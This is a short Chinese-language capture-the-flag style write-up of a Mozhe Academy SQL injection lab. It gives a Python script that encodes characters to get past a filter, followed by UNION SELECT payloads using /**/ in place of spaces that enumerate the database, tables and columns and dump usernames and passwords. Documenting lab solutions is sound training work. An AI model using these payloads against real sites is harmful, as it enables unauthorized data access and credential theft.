墨者学院SQL过滤字符后手工注入漏洞测试(第1题)

N 人看过

1、 我也没想到那么多弯弯绕绕的,看到评论区有提示,就照做了,编写url编码脚本,获取注入payload,测试回显位置。

#!/usr/bin/env python
# -*- coding:UTF-8 -*-
#time:2019/11/9  1:03
#author:White9527
from urllib import parse
import re 

#查询语句
s1 = """order by 4"""
s2 = parse.quote(s1,"utf-8")
s3 = re.findall(r'.',s2)
j = 0 
for i in s3:
	if (s3[j]!='%' and s3[j-1]!='%' and s3[j-2]!='%'):
		s3[j] = hex(ord(s3[j]))
	j=j+1
s4 = "".join(s3)
s4 = re.sub("0x","%",s4)
print(s4)

在这里插入图片描述
2、 爆库

/**/union/**/select/**/1,database(),3,4

在这里插入图片描述
3、 爆表

/**/union/**/select/**/1,group_concat(table_name),3,4/**/from  	/**/information_schema.tables/**/where/**/table_schema/**/like/**/'%storm%'

在这里插入图片描述

4、 爆列

/**/union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/'stormgroup_member'

在这里插入图片描述
5、 爆值

/**/union/**/select/**/1,group_concat(name,0x7c,password,0x7e),3,4/**/from/**/stormgroup_member

在这里插入图片描述
6、 登陆获取key

在这里插入图片描述

本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 (CC BY-NC-ND 4.0) 进行许可。